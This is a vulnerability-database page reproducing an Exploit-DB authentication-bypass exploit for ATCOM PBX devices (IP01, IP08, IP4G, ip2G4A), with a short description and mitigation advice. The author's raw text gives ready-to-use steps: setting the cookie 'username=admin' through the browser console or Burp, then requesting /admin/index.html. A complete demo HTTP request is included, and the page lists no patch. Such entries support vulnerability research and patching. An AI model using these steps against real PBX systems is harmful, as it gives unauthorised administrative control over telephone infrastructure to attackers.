ATCOM PBX system , auth bypass exploit

vendor:

ATCOM PBX system

by:

i-Hmx

5.5

CVSS

MEDIUM

Authentication Bypass

287

CWE

Product Name: ATCOM PBX system

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: ATCOM IP01, IP08, IP4G, ip2G4A

ATCOM PBX system , auth bypass exploit

The ATCOM PBX system is affected by an authentication bypass vulnerability that allows an attacker to gain admin access without prior authentication. The vulnerability exists in the 'js/util.js' file, where the security check relies on the presence of a 'username' value in the cookies. If the value is not present, the user is redirected to the login page. By manipulating the cookies and setting 'username=admin', an attacker can bypass the authentication and gain admin access.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper authentication mechanisms that do not rely solely on client-side checks. Additionally, the cookies should be encrypted and validated on the server-side.

Source

Exploit-DB raw data:

# Title: ATCOM PBX system , auth bypass exploit
# Author: i-Hmx
# contact : n0p1337@gmail.com
# Home : sec4ever.com
# Tested on : ATCOM IP01 , IP08 , IP4G and ip2G4A

Details
The mentioned system is affected by auth bypass flaw that allow an attacker to get admin access on the vulnerable machine without perior access
The security check is really stupid , depend on js
affected lines

js/util.js
function alertWithoutLogin(){
    var username = getCookie("username");
    //alert(username);
    if(!!!username){
        alert('Sorry, permission denied. Please login first!');
    }
}

so actually it just check if username value exist in cookies
and if not , redirect to login.html
just like that!!!!!!!!!!!!!

exploitation?!
just from browser , press f12 , open console
type document.cookie="username=admin"
or from burp intercept proxy and set the cookies as well
go to ip/admin/index.html
and you are in , simple like that :/

Demo request

GET /admin/index.html HTTP/1.1
Host: 192.168.44.12
User-Agent: Mozilla/1.0 (Windows NT 3.3; WOW32; rv:60.0) Gecko/20010101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: username=admin
Connection: close
Upgrade-Insecure-Requests: 1

From Eg-R1z with love
./Faris